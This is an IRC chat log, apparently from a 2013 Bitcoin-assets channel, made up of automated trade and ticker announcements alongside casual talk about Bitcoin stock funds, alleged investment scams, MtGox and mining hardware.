0.003601 = 0.0072 BTC [-] Apr 06 19:51:17 [BTCTC] [S.DICE-PT] 1 @ 0.00357 BTC [-] Apr 06 19:54:51 ;;ticker Apr 06 19:54:52 BTCUSD ticker | Best bid: 143.11968, Best ask: 143.20000, Bid-ask spread: 0.08032, Last trade: 143.20000, 24 hour volume: 43220.78928430, 24 hour low: 139.00000, 24 hour high: 144.94000, 24 hour vwap: 142.25566 Apr 06 19:56:34 quiet weekend thankfully. Apr 06 19:57:05 http://www.superfluosopher.com/digital-world/the-internet-needs-idiots Apr 06 20:07:38 [BTCTC] [ASICMINER-PT] 3 @ 0.7799 = 2.3397 BTC [+] Apr 06 20:07:41 [BTCTC] [ASICMINER-PT] 5 @ 0.7799 = 3.8995 BTC [+] Apr 06 20:09:10 deadweasel innit nice. Apr 06 20:09:16 !ticker m s.dice Apr 06 20:09:18 [MPEX:S.DICE] 1D: 0.00276111 / 0.00311367 / 0.0033333 (17066 shares, 53.14 BTC), 7D: 0.00276111 / 0.00323887 / 0.00439992 (547459 shares, 1,773.15 BTC), 30D: 0.00276111 / 0.00364928 / 0.006 (1624459 shares, 5,928.11 BTC) Apr 06 20:15:02 Hmm, I'm surprised about those stats. There's no source included for them sadly. Apr 06 20:26:20 well.. he is fluoridated. Apr 06 20:27:52 [MPEX] [S.MPOE] 700 @ 0.00070085 = 0.4906 BTC [-] Apr 06 20:28:27 i know, at least they get us high for free. Apr 06 20:28:47 8 glasses a day Apr 06 20:49:19 [BTCTC] [ASICMINER-PT] 22 @ 0.7715 = 16.973 BTC [-] Apr 06 20:49:25 [BTCTC] [ASICMINER-PT] 1 @ 0.7711 BTC [-] Apr 06 21:30:30 ;;totalbc Apr 06 21:30:31 10999975.0 Apr 06 21:30:54 next block. Apr 06 21:31:14 odd, blockexplorer already shows 11mn Apr 06 21:34:31 >. I have no qualms about what EskimoBob did so long as he pays for it, one way or another. And a 10% return in a little over a month is fine with me. I've evaluated his business plan and I rather like the little setup he has going. It works like this. Either he makes me rich, or he turns out to be a scammer and I get the last laugh. I could care less either way. Apr 06 21:34:34 omg this is rich Apr 06 21:34:56 wait what? Apr 06 21:35:05 also this >EskimoBob is receiving regular scheduled distributions on his investment along with all my other former shareholders. Further, I own some shares of ART. In short, EskimoBob works for me now, Augustocroppo, and in my books that's the way it should be. Apr 06 21:35:11 quote from usagi Apr 06 21:35:14 both Apr 06 21:35:20 https://bitcointalk.org/index.php?topic=130947.msg1757328#msg1757328 Apr 06 21:35:39 lol Apr 06 21:35:52 i dont even.... Apr 06 21:36:21 lol Apr 06 21:36:27 well so good for them then Apr 06 21:37:24 BTC has gone from $10 to $100, and ART lost 98.41% of it's investor's money. To point out the obvious, the expected loss was 90%, not 98.41%. Losing that extra 8.41% is much, much larger than it seems. Because accounting for the fluctuation in currency prices, ART went on to lose 84.1% of it's value. Apr 06 21:37:24 Please explain how you lost 84.1% of your investor's money, or (at current exchange prices) over $60,000. Apr 06 21:37:26 this is pretty good Apr 06 21:37:52 yup Apr 06 21:39:58 I'm about to hire Yakuza to collect my coin from Usagi Apr 06 21:40:21 "But that is water under the bridge now. EskimoBob is receiving regular scheduled distributions on his investment along with all my other former shareholders." <- is a lie Apr 06 21:40:42 i think hiring psy would be sufficient Apr 06 21:40:46 the payments were not regular and have ceased without any warning or explanation except when probed Apr 06 21:40:52 [HAVELOCK] [SDICE] 3 @ 0.26 = 0.78 BTC [+] Apr 06 21:40:53 ..er..that's korea. nvm. Apr 06 21:42:19 I'm so glad you guys ran him out of business. Apr 06 21:42:51 the payments were not regular and have ceased without any warning or explanation except when probed << sorta like tradehill ? Apr 06 21:43:26 no that was the old company you silly! Apr 06 21:49:01 the tradehill people vanished Apr 06 21:49:09 but usagi is still trying to "make a name for himself" Apr 06 21:49:31 no they didn't vanish, bitcoin scamdation people are trying to push kenna's new scam Apr 06 21:49:48 well, were. i think they got scared off meanwhile. Apr 06 21:51:04 why do you think so? Apr 06 21:51:08 the scared off part Apr 06 21:52:44 there will be a gox announcement about alternative currencies next week? Apr 06 21:56:06 maybe they clearly think their multicurrency multiorder book isn't laggy enough Apr 06 21:56:37 ;;goxlag Apr 06 21:56:37 MtGox lag is 1.2938 seconds. During this time, light travels 0.00259276071389 AU. You could have sent a bitcoin from Earth to Moon (0.00257 AU). Apr 06 21:56:38 kakobrekla because they seem to have abandoned the promotion effort. Apr 06 21:57:02 hmm Apr 06 21:57:02 KRS1 i'll bet you there won't be. Apr 06 21:57:07 or they are just plain incompetent Apr 06 21:57:59 its gonna be all over once i manage to slam btc/usd in mt4 anyway. Apr 06 22:00:40 really, i wouldn't put it past them trying to solve their problems Apr 06 22:01:12 by throwing in another virtual currency on bitcoin side Apr 06 22:01:28 like euro/jpy is on usd side Apr 06 22:01:51 [HAVELOCK] [SDICE] 3 @ 0.26 = 0.78 BTC [+] Apr 06 22:02:03 thereby their monstrous order book code achieving sentience Apr 06 22:04:09 then we're lost. unless we can release mpex code to slay it. Apr 06 22:05:06 kakobrekla do that already Apr 06 22:05:22 is not easy. Apr 06 22:05:51 anyway, i just signed off on some juicy foruming Apr 06 22:06:04 link you as soon as it's there, i think you'll appreciate. Apr 06 22:10:46 MPOE-PR is on the offensive? Apr 06 22:10:51 ^- @ mircea_popescu Apr 06 22:12:00 ;;seen smickles Apr 06 22:12:00 smickles was last seen in #bitcoin-assets 2 days, 3 hours, 29 minutes, and 37 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 06 22:14:38 [BTCTC] [S.DICE-PT] 1 @ 0.00427 BTC [+] Apr 06 22:14:41 https://bitcointalk.org/index.php?topic=166578.msg1758253#msg1758253 Apr 06 22:14:42 there we go. Apr 06 22:14:44 [BTCTC] [S.DICE-PT] 2 @ 0.00428 = 0.0086 BTC [+] Apr 06 22:17:11 [MPEX] [S.DICE] 204 @ 0.0032 = 0.6528 BTC [-] Apr 06 22:17:28 [BTCTC] [S.DICE-PT] 2 @ 0.004 = 0.008 BTC [-] Apr 06 22:17:31 [MPEX] [S.DICE] 1000 @ 0.00321 = 3.21 BTC [+] Apr 06 22:17:34 [BTCTC] [S.DICE-PT] 1 @ 0.00343 BTC [-] Apr 06 22:17:36 http://data.mtgox.com/api/2/NMCUSD/money/ticker http://data.mtgox.com/api/2/LTCUSD/money/ticker http://data.mtgox.com/api/2/PPCUSD/money/ticker Apr 06 22:17:49 looks like they will add NMC & LTC Apr 06 22:18:26 [MPEX] [S.DICE] 3434 @ 0.003333 = 11.4455 BTC [+] Apr 06 22:22:20 ehh Apr 06 22:22:30 berating a core Bitcoin dev.... Apr 06 22:22:42 hey mp Apr 06 22:25:00 hey bj Apr 06 22:25:16 thestringpuller mpoe delivers. Apr 06 22:26:19 so Garzik is a glitzdev now? Apr 06 22:26:39 also I really like this quote: "Nobody respects actors. Nobody. Everybody respects producers. Everybody. Including the actors. Starting with the actors." since being on set I have found this to be incredibly true. Apr 06 22:26:45 Without the producers, there is not industry. Apr 06 22:26:49 no* Apr 06 22:28:03 yeah. Apr 06 22:29:15 I'm moving to romania, that's where all the cool people live. Apr 06 22:29:17 jkjk Apr 06 22:29:47 i only take girls, so. Apr 06 22:30:03 [BTCTC] [BTC-BOND] 15 @ 0.00992 = 0.1488 BTC [-] Apr 06 22:30:06 [BTCTC] [BTC-BOND] 11 @ 0.009911 = 0.109 BTC [-] Apr 06 22:30:41 [BTCTC] [BTC-TRADING-PT] 100 @ 0.15271 = 15.271 BTC [-] Apr 06 22:31:25 thestringpuller what set have you been on btw ? Apr 06 22:31:49 [BTCTC] [PAJKA.BOND] 2 @ 0.106 = 0.212 BTC [+] Apr 06 22:38:13 so your rape contest got some pretty decent submissions Apr 06 22:39:35 bowjob it did didn't it. Apr 06 22:39:45 mircea_popescu I've been on the set of Walking Dead and a few others, didn't work was just a guest of my friends who are in the industry. Apr 06 22:39:49 what did you expect? gore? tentacles? Apr 06 22:40:08 mircea_popescu: also been on the set of a few shows that were pitched to Adult Swim but never made it to air. Apr 06 22:40:17 pretty cvool Apr 06 22:41:17 film industry is cutthroat, I can't wait for the first scammer to try and raise money for a movie Apr 06 22:41:43 and it ends up being some indiegogo bull crap that gets 100 views on youtube after spending 10,000 coins Apr 06 22:41:50 there's this bitcoin documentary, dunno how they raised money for it Apr 06 22:42:14 thestringpuller ya that already happened. Apr 06 22:42:26 well shit Apr 06 22:43:41 what is the rule no #? when you thought of a scam, someone on internet already did it Apr 06 22:43:58 maybe rule 33, preceding rune 34 Apr 06 22:44:01 *rule Apr 06 22:46:11 lol jurov Apr 06 22:46:31 what's the call code for nigeria ? Apr 06 22:53:37 LOL Apr 06 22:53:47 234 is the country code Apr 06 22:53:58 234 Apr 06 22:53:59 Nigeria, Dialing code Apr 06 22:55:59 $avg Apr 06 22:56:10 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 06 23:06:18 gah, ATC hasnt paid me yet. think he ran away? Apr 06 23:06:41 atc ? Apr 06 23:07:13 ATC777, the dude that shorted BTC at 75 dollars Apr 06 23:07:29 it was only 6 BTC split between me and john, the mod.. but it amounts to $1k now Apr 06 23:08:08 his excuse was his computer fried while mining ltc.!! Apr 06 23:10:18 heh. shorting btc, such an adventure. Apr 06 23:11:47 I love the 5000 btc wall at 145 Apr 06 23:12:10 3000 btc wall at 141 Apr 06 23:12:20 http://www.publicpolicypolling.com/pdf/2011/PPP_Release_National_ConspiracyTheories_040213.pdf Apr 06 23:12:21 price is the most stable it's been in months Apr 06 23:12:25 oooookkay... Apr 06 23:12:46 thestringpuller innit nice ? Apr 06 23:13:16 seems like half the news is about hatin btc Apr 06 23:13:29 they jelly they didnt get in early... but we're still early Apr 06 23:13:44 maybe Apr 06 23:13:46 bowjob if everyone was pumping it we'd have a probkem. Apr 06 23:13:51 the biggest danger to bitcoin is yourself if you're inpet Apr 06 23:13:54 inept* Apr 06 23:14:16 Did they take their 1,247 participants in an asylum or at some conspiracists conference or something? Apr 06 23:15:02 Namworld you know, not as a dig but, you seem regularly confounded by the state of the world in various details. Apr 06 23:15:08 maybe you just hang out in an insland ? Apr 06 23:15:36 LOL Apr 06 23:15:50 [HAVELOCK] [HIM] 3 @ 1.899 = 5.697 BTC [-] Apr 06 23:16:22 price of btc on gox is inflated Apr 06 23:16:31 I just live in Canada and rarely encounter such people... Apr 06 23:16:46 Maybe I should start asking these kind of questions to random people. Apr 06 23:16:55 O CANADA Apr 06 23:17:07 Maybe it's all an illusion Apr 06 23:17:08 Something something something Canada Apr 06 23:17:28 That's pretty much it. Apr 06 23:17:33 lol Apr 06 23:17:34 looks like HIM is recovering, but it's gonna plummet if they depend on BFL for their ASICS Apr 06 23:17:38 !ticker H HIM Apr 06 23:17:39 [HAVELOCK:HIM] 1D: 1.89900000 / 1.8997619 / 1.90000000 (21 shares, 39.89500000 BTC), 7D: 1.87000000 / 1.97199182 / 2.08000000 (110 shares, 216.91910000 BTC), 30D: 1.41000000 / 1.84047117 / 2.08000000 (694 shares, 1277.28699220 BTC) Apr 06 23:18:12 him was 4.6 btc when it started Apr 06 23:18:21 then it reached 20 btc, then it split Apr 06 23:18:34 It is a strong fund Apr 06 23:18:35 its doing extremely well for a 22gigahash farm Apr 06 23:18:45 yeah, the bfl gets me Apr 06 23:18:58 but as the difficulty rises I'm paranoid of their being a run on the stock Apr 06 23:19:09 everyone will vacate their position in HIM and move to ASICMINER or something Apr 06 23:19:20 i missed the reaction here about bfl jacking prices of their non existent machine Apr 06 23:19:21 s Apr 06 23:20:53 HIM started at ~4.6 before the split? Apr 06 23:20:55 jeezus Apr 06 23:21:17 the split was about approx 14 btc / share no? @ bowjob Apr 06 23:21:17 so it's a 22gigahash farm ? how many shares total ? Apr 06 23:21:25 lemme check mircea_popescu Apr 06 23:21:48 ty Apr 06 23:21:54 According to the poll, the more conservative someone is, the more likely someone is to believe pretty much anything. Apr 06 23:22:56 mircea_popescu: 300 shares were issued initially during the IPO from June of 2012 to October of 2012 Apr 06 23:23:31 as bowjob indicated 4.6 BTC was the initial price for the first 175 shares Apr 06 23:23:47 it wasnt a hot stock back then Apr 06 23:23:53 at the time, pirates fund was the rage Apr 06 23:24:01 the remaining 125 were priced at 15.0 BTC per unit Apr 06 23:24:14 On March 1st 2013 there was a 1:10 split Apr 06 23:24:21 3000 shares exist as of today Apr 06 23:25:03 ;;calc 3000 * 1.89 Apr 06 23:25:04 5670 Apr 06 23:25:29 ;;calc (175 * 4.6) + (125 * 15) Apr 06 23:25:29 2680 Apr 06 23:25:36 so it's doubled in value Apr 06 23:28:46 https://bitcointalk.org/index.php?topic=169062.new#new Apr 06 23:28:49 lovely Apr 06 23:29:22 wait what. Apr 06 23:29:32 22 gh farm worth 6k btc ?! Apr 06 23:29:39 how is this worth a million dollars ? Apr 06 23:30:30 " NOw I can not live in my home and live in the garage of vegetable garden from my parents." lol Apr 06 23:30:34 That's like what 30k worth of GPU servers? Apr 06 23:30:39 Everyones worth a mil now mircea Apr 06 23:30:49 at least those who knew about btc Apr 06 23:30:55 whats the hassle man Apr 06 23:31:23 mp, i remember you asking topace about the hashpower of the rig Apr 06 23:31:26 of the farm Apr 06 23:31:30 he said 22 gigahash Apr 06 23:31:35 you don't remember? :p Apr 06 23:31:57 he also said the fund will buy his 1.5 TH bfl preorder Apr 06 23:32:12 i dont think he ordered avalons Apr 06 23:38:55 o so wait, it's the case they have ~6k btc on hand + 22gh deployed ? Apr 06 23:39:07 so the stock is pretty much 99% cash ? Apr 06 23:39:46 bowjob i sorta vaguely recall ya Apr 06 23:40:46 [BTCTC] [RSM] 489 @ 0.001021 = 0.4993 BTC [-] Apr 06 23:41:12 "Hi Mara. That is a hard life you have there." Apr 06 23:41:15 [BTCTC] [RSM] 3 @ 0.00102 = 0.0031 BTC [-] Apr 06 23:41:23 [BTCTC] [RSM] 102 @ 0.00101 = 0.103 BTC [-] Apr 06 23:41:50 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] Apr 06 23:42:08 yeah man, 22 gh/s for $1m. Apr 06 23:42:31 they have a 1.5 TH BFL pre order.. we all know how that turned out. Apr 06 23:43:08 if bitbet sentiment is correct, batch 2 avalon will ship before bfl Apr 06 23:43:13 due to power issues, ect Apr 06 23:43:51 bowjob all i gotta say is : bfl demoed box of fans ; 3 months later their rig cools passively. Apr 06 23:48:47 i;d be nice to get 3 mil for my avalon 2 Apr 06 23:48:55 then again i might be shortchanging myself in the future Apr 06 23:48:56 lol Apr 06 23:51:30 [BTCTC] [GSDPT] 75 @ 0.00271 = 0.2033 BTC [+] Apr 06 23:51:33 [BTCTC] [GSDPT] 58 @ 0.00271 = 0.1572 BTC [+] Apr 06 23:52:10 [BTCTC] [GSDPT] 143 @ 0.0027 = 0.3861 BTC [-] Apr 07 00:07:43 lmao Apr 07 00:16:09 ;;bids 0 Apr 07 00:16:12 There are currently 31700037 bitcoins demanded at or over 0.0 USD, worth 11949260.2416 USD in total. | Data vintage: 0.0101 seconds Apr 07 00:22:51 [HAVELOCK] [KCIM] 1 @ 1.185 BTC [+] Apr 07 00:24:50 [HAVELOCK] [VTX] 1 @ 0.44 BTC [+] Apr 07 00:27:46 hmm anyone know if the old blkXXX.dat files in ~/.bitcoin can be removed? they arent used anymore in 0.8 right? 0.8 uses the files in the ~/.bitcoin/blocks folder ? Apr 07 00:28:03 whoop sorry stupid guest Apr 07 00:28:47 well... as with anything else in bitcoin, nobody really knows Apr 07 00:28:49 try it out and see Apr 07 00:28:54 hahha Apr 07 00:28:56 indeed Apr 07 00:29:05 well the date/time on them are all last-updated when i did the 0.8 upgrade Apr 07 00:29:08 so im gonna assume safe Apr 07 00:29:13 and if its not, well itll just redownload Apr 07 00:29:23 fucking screwed up my backup system Apr 07 00:29:36 my nightly backups went from 400MB on the server, to like 10GB Apr 07 00:29:51 Guest3893: I have removed them fine. Apr 07 00:30:10 jurov: that was me :) Apr 07 00:30:40 haha ok. Apr 07 00:31:05 just inquired by email if asset transfers between havelock users are possible? Apr 07 00:34:50 [HAVELOCK] [SDICE] 1 @ 0.265 BTC [+] Apr 07 00:38:41 jurov: not automatically Apr 07 00:38:44 it'd be a manual push Apr 07 00:38:59 so 10 BTC fee, too? Apr 07 00:38:59 request by email and i can do it Apr 07 00:39:03 hmmm Apr 07 00:39:20 10 seems a bit steep at current rates eh Apr 07 00:39:26 even for havelock->mpex push Apr 07 00:39:41 i do plan on building an interface to do it locally between users Apr 07 00:49:35 [BTCTC] [GSDPT] 1 @ 0.00297 BTC [+] Apr 07 00:49:39 [BTCTC] [GSDPT] 85 @ 0.00298 = 0.2533 BTC [+] Apr 07 00:49:42 [BTCTC] [GSDPT] 500 @ 0.00298 = 1.49 BTC [+] Apr 07 00:49:46 [BTCTC] [GSDPT] 55 @ 0.00299 = 0.1645 BTC [+] Apr 07 00:50:59 ;;ticker Apr 07 00:51:00 BTCUSD ticker | Best bid: 143.00000, Best ask: 143.50000, Bid-ask spread: 0.50000, Last trade: 143.00000, 24 hour volume: 20022.34673600, 24 hour low: 139.54000, 24 hour high: 144.50000, 24 hour vwap: 142.27062 Apr 07 00:51:07 heh 20k. more like it. Apr 07 00:51:55 What exactly happens here? Apr 07 00:53:19 bitcoin finance. Apr 07 00:53:32 So like stock trading? Apr 07 00:53:35 yeah. Apr 07 00:54:07 Just out of curiosity, why does this site look so...old? Apr 07 00:54:37 you're looking at irc through a web interface. Apr 07 00:54:50 [HAVELOCK] [SDICE] 5 @ 0.2924 = 1.462 BTC [+] Apr 07 00:54:58 which site? mpex.co? yeah because it is Apr 07 00:55:05 this is the future Apr 07 00:55:11 everything is simplistic. lol Apr 07 00:55:11 I understand the ICR, but MPEX Apr 07 00:55:29 whoa fuck me he actually did mean mpex Apr 07 00:55:34 hahaha Apr 07 00:55:46 it looks old because it is old. like dragons Apr 07 00:55:54 and other ancient evil. Apr 07 00:55:58 ahh, i see Apr 07 00:55:58 http://mpex.co/cherries2.png Apr 07 00:56:03 it comes with this pic Apr 07 00:56:25 easter egg much? Apr 07 00:56:30 sigh http://www.telegraph.co.uk/finance/economics/9976524/Russians-most-interested-in-Bitcoin-searches-show.html Apr 07 00:56:31 a little. Apr 07 00:56:44 bgupta why sigh ? Apr 07 00:57:14 [BTCTC] [SYNERGY] 1 @ 0.01998 BTC [-] Apr 07 00:57:18 [BTCTC] [SYNERGY] 2 @ 0.01999 = 0.04 BTC [+] Apr 07 00:57:40 while i'm still asking noobish questions. What's assbot? Apr 07 00:57:55 a bot that informs you? Apr 07 00:57:58 yeah Apr 07 00:58:16 meh: informs of trades that happen on the various exchange sites Apr 07 00:58:28 you can find sites listed on http://bitcoin-assets.com Apr 07 00:58:31 most of them have tickers on assbot Apr 07 00:58:39 meh you can also read http://trilema.com/2013/the-many-ways-available-for-talking-to-mpex/ Apr 07 00:58:40 !ticker h vtx Apr 07 00:58:42 [HAVELOCK:VTX] 1D: 0.40600000 / 0.4351875 / 0.44000000 (80 shares, 34.81499976 BTC), 7D: 0.36000000 / 0.49321213 / 0.61488800 (1250 shares, 616.51515803 BTC), 30D: 0.36000000 / 0.4346185 / 0.79900000 (13330 shares, 5793.46456825 BTC) Apr 07 00:58:47 This, this, seems like a nice idea Apr 07 00:59:04 Bubble/cyprus/russians.. sartng to think we may infact be de for a serious correction.. Apr 07 00:59:38 damn computer is dropping chars. prolly ned to restart IRC clin Apr 07 00:59:41 bgupta how does russians - > correction follow ? Apr 07 00:59:57 he means upwards Apr 07 01:00:03 cause putins says so Apr 07 01:00:52 correction upward ? we've not been on a downtrend since last year Apr 07 01:01:19 topace you run him btw ? Apr 07 01:01:28 anyon knows how easy is for russian to buy btc? i guess sepa isn't accessible there Apr 07 01:01:28 mircea_popescu: yes Apr 07 01:01:34 you publish reports somewherre ? Apr 07 01:01:44 yea on the financials tab on the site Apr 07 01:01:45 just html Apr 07 01:01:45 jurov sure it is. all their cash is in london nao Apr 07 01:01:51 ok.. we'll see.. anyway gota run go eat. shld be iteresting. Apr 07 01:01:56 topace mind linking the lazy ? Apr 07 01:02:03 https://www.havelockinvestments.com/fund.php?symbol=HIM Apr 07 01:02:07 click financials Apr 07 01:02:13 (its javascripted tabs) Apr 07 01:02:26 oh shit that reminds me, i never published last months yet Apr 07 01:02:26 crap Apr 07 01:02:31 ill do that tomrroww Apr 07 01:02:32 gotta run now Apr 07 01:02:35 bachelor party for friend Apr 07 01:02:37 2 hour drive away Apr 07 01:02:40 and they're already half drunk Apr 07 01:02:42 mk Apr 07 01:02:55 this is a cashflow statement, was looking for a balancesheet Apr 07 01:02:56 there's almosta year's worth of reports there now tho :) Apr 07 01:02:59 oh Apr 07 01:03:02 its under fund reports Apr 07 01:03:05 at the top of the page Apr 07 01:03:05 a ok Apr 07 01:03:07 but only quarterly Apr 07 01:03:13 statement of net assets Apr 07 01:03:17 not exactly a balance sheet Apr 07 01:03:18 but close Apr 07 01:04:22 ok well... i'm confused now. net assets 1.6k btc, and 3k shares outstanding Apr 07 01:04:44 well talk tomorrow or monday Apr 07 01:04:45 do these 1.1k btc worth of mining gear correspond to a 22gh/s mining farm ? Apr 07 01:04:48 ill be in the office all day monday Apr 07 01:04:51 alrighty. Apr 07 01:05:57 So somehow I found myself in the ICR chat with some of the top bitcoin players? Apr 07 01:06:06 yes. Apr 07 01:06:16 and its irc not icr Apr 07 01:06:35 Whops, slip of the keyboard but awesome. Apr 07 01:07:43 jurov anyway, isn't the novacoin exchange russian ? Apr 07 01:07:46 yeah, this is the new world order Apr 07 01:08:12 If I was thinking about investing somewhere where would you recommend at such a time in bitcoins history? Apr 07 01:08:31 after the great crash Apr 07 01:08:35 prolly your best bet is to lurk here. Apr 07 01:08:46 wait Apr 07 01:08:49 don't know about novacoin Apr 07 01:08:55 i interpreted the question wrong Apr 07 01:09:01 Not invest into bitcoins, but bitcoins stocks Apr 07 01:09:28 yes meh. lurk here a few weeks, you'll get a handle of what's what, can proceed from there. Apr 07 01:09:40 Works for me! Apr 07 01:10:00 meh also try reading the prospects and do some P/E calculations Apr 07 01:10:20 you missed some great moments.. like someone fat fingering $80k Apr 07 01:11:23 I guess I was already doing P/E calculations without knowing what they were called. and great moments? $80K? Apr 07 01:12:18 someone sold lots of satoshi dice shares at 1/10th of their price accidentally, worth about 80k at the time Apr 07 01:12:19 [BTCTC] [GSDPT] 50 @ 0.003 = 0.15 BTC [+] Apr 07 01:12:23 [BTCTC] [GSDPT] 30 @ 0.00309 = 0.0927 BTC [+] Apr 07 01:12:35 it was a fat finger mistake, missed an extra zero Apr 07 01:12:46 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Apr 07 01:13:16 That's sad and awesome at the same time. Apr 07 01:13:27 [BTCTC] [ASICMINER-PT] 1 @ 0.7799 BTC [+] Apr 07 01:13:46 anyone saw ? http://www.thebitcointrader.com/2013/04/torbroker-silk-road-of-stock-brokers.html Apr 07 01:14:32 [BTCTC] [ASICMINER-PT] 4 @ 0.78 = 3.12 BTC [+] Apr 07 01:16:15 also, https://bitcointalk.org/index.php?topic=159237.msg1745116#msg1745116 Apr 07 01:16:52 [BTCTC] [PAJKA.BOND] 1 @ 0.106 BTC [+] Apr 07 01:22:27 Ooh. 1 ton of gold seized at border crossing Apr 07 01:24:34 jurov saw it in yest's suymmaries, didn't think anything of it Apr 07 01:25:44 [MPEX] [S.DICE] 1800 @ 0.00300609 = 5.411 BTC [-] Apr 07 01:28:04 !ticker m S.DICE Apr 07 01:28:05 [MPEX:S.DICE] 1D: 0.00276111 / 0.00311396 / 0.003333 (16960 shares, 52.81 BTC), 7D: 0.00276111 / 0.00323841 / 0.00439992 (553467 shares, 1,792.36 BTC), 30D: 0.00276111 / 0.00364758 / 0.006 (1630897 shares, 5,948.83 BTC) Apr 07 01:28:13 !ticker m S.MPOE Apr 07 01:28:13 [MPEX:S.MPOE] 1D: 0.00070053 / 0.00070878 / 0.000714 (44033 shares, 31.21 BTC), 7D: 0.00059218 / 0.00066953 / 0.00071514 (2191537 shares, 1,467.31 BTC), 30D: 0.00059218 / 0.00069285 / 0.00077505 (8957250 shares, 6,206.03 BTC) Apr 07 01:28:17 !ticker m ^OIX Apr 07 01:28:18 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 104.18044961 / 111.50875055 / 136.37176816 (22473 shares, 10,540.45 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 07 01:29:07 nice to see a quite weekend and rock steady USD/BTC rate... Apr 07 01:29:13 quiet Apr 07 01:35:59 [BTCTC] [GSDPT] 57 @ 0.00316 = 0.1801 BTC [+] Apr 07 01:38:48 too quiet Apr 07 01:40:02 BAM! Apr 07 01:56:30 [BTCTC] [BITVPS] 1 @ 0.00239 BTC [-] Apr 07 01:56:35 [BTCTC] [BITVPS] 10 @ 0.0024 = 0.024 BTC [+] Apr 07 01:59:21 Wait, wait, wait. I was talking to the owner of MPEX? Apr 07 01:59:45 In presence of celebrity Apr 07 02:00:20 meh: and you didnt get his autograph??? Apr 07 02:00:50 irc autographs are teh best Apr 07 02:02:02 HAHAHAHAHA Apr 07 02:02:05 HAHAHAHAHAHAHAHAHAHA Apr 07 02:03:25 [BTCTC] [BITVPS] 389 @ 0.0024 = 0.9336 BTC [+] Apr 07 02:04:05 ;;bc,24hprc Apr 07 02:04:07 141.03 Apr 07 02:05:49 oh it works again? Apr 07 02:06:01 ;;seen smickles Apr 07 02:06:01 smickles was last seen in #bitcoin-assets 2 days, 7 hours, 23 minutes, and 39 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 07 02:14:31 [BTCTC] [S.BBET-PT] 615 @ 0.00177 = 1.0886 BTC [+] Apr 07 02:15:07 !ticker m S.BBET Apr 07 02:15:07 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0007531 / 0.00201282 / 0.00201395 (25028 shares, 50.38 BTC), 30D: 0.00050015 / 0.00192763 / 0.00201401 (77248 shares, 148.91 BTC) Apr 07 02:15:37 ;;goxlag Apr 07 02:15:38 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 07 02:16:17 http://www.troll.me/images/conspiracy-keanu/what-if-the-government-was-replaced-by-idiots-and-were-all-on-a-game-show-to-see-how-long-we-can-tolerate-it.jpg Apr 07 02:17:08 nice Apr 07 02:17:21 possibly true Apr 07 02:20:05 [BTCTC] [S.BBET-PT] 1 @ 0.00178 BTC [+] Apr 07 02:22:05 ;;ticker Apr 07 02:22:06 BTCUSD ticker | Best bid: 143.22300, Best ask: 143.48899, Bid-ask spread: 0.26599, Last trade: 143.48899, 24 hour volume: 17917.72892032, 24 hour low: 139.54000, 24 hour high: 143.90000, 24 hour vwap: 142.12441 Apr 07 02:22:28 ;;calc 18000*143 Apr 07 02:22:28 2574000 Apr 07 02:44:51 [BTCTC] [ASICMINER-PT] 4 @ 0.78 = 3.12 BTC [+] Apr 07 03:15:50 [HAVELOCK] [SDICE] 1 @ 0.30969999 BTC [+] Apr 07 03:15:51 [HAVELOCK] [SDICE] 4 @ 0.3097 = 1.2388 BTC [+] Apr 07 03:16:49 [HAVELOCK] [SDICE] 1 @ 0.3097 BTC [+] Apr 07 03:17:55 [HAVELOCK] [HIM] 4 @ 1.895 = 7.58 BTC [-] Apr 07 03:18:49 [HAVELOCK] [SDICE] 2 @ 0.3098 = 0.6196 BTC [+] Apr 07 03:20:50 [HAVELOCK] [SDICE] 2 @ 0.31 = 0.62 BTC [+] Apr 07 03:24:06 [BTCTC] [BTC-TRADING-PT] 1 @ 0.18199 BTC [+] Apr 07 03:24:10 [BTCTC] [BTC-TRADING-PT] 2 @ 0.182 = 0.364 BTC [+] Apr 07 03:40:33 [MPEX] [S.MPOE] 7700 @ 0.00070001 = 5.3901 BTC [-] Apr 07 03:51:51 https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash3/528464_10151846460759966_1261528900_n.jpg Apr 07 03:53:47 [BTCTC] [ASICMINER-PT] 1 @ 0.7705 BTC [-] Apr 07 03:53:48 accually the gangam resemblce is what i find funny Apr 07 03:53:50 [BTCTC] [ASICMINER-PT] 1 @ 0.7701 BTC [-] Apr 07 03:54:55 [BTCTC] [S.DICE-PT] 1 @ 0.00428 BTC [+] Apr 07 03:57:46 ;;ticker Apr 07 03:57:47 BTCUSD ticker | Best bid: 142.80000, Best ask: 143.20998, Bid-ask spread: 0.40998, Last trade: 144.00000, 24 hour volume: 18593.38989175, 24 hour low: 139.54000, 24 hour high: 143.99800, 24 hour vwap: 142.21853 Apr 07 04:03:49 [MPEX] [S.MPOE] 1607 @ 0.00070715 = 1.1364 BTC [+] Apr 07 04:03:51 [MPEX] [S.MPOE] 173 @ 0.00069565 = 0.1203 BTC [-] Apr 07 04:03:53 [MPEX] [S.MPOE] 1300 @ 0.00069565 = 0.9043 BTC [-] Apr 07 04:19:41 [BTCTC] [ASICMINER-PT] 1 @ 0.7823 BTC [+] Apr 07 04:22:49 hi ian_ Apr 07 04:23:09 heres a long shot, is your second name Bakewell? :) Apr 07 04:23:16 nope Apr 07 04:23:33 I bet thats what he'd say. Apr 07 04:24:56 :-) Apr 07 04:27:02 lol Apr 07 04:30:15 [BTCTC] [B.YABMC] 1 @ 0.01799 BTC [+] Apr 07 04:31:29 ;;bida 0 Apr 07 04:31:29 Error: "bida" is not a valid command. Apr 07 04:31:31 ;;bida 0 Apr 07 04:31:31 Error: "bida" is not a valid command. Apr 07 04:31:36 ;;bids 0 Apr 07 04:31:38 There are currently 31701185 bitcoins demanded at or over 0.0 USD, worth 12041582.8939 USD in total. | Data vintage: 0.0102 seconds Apr 07 04:35:05 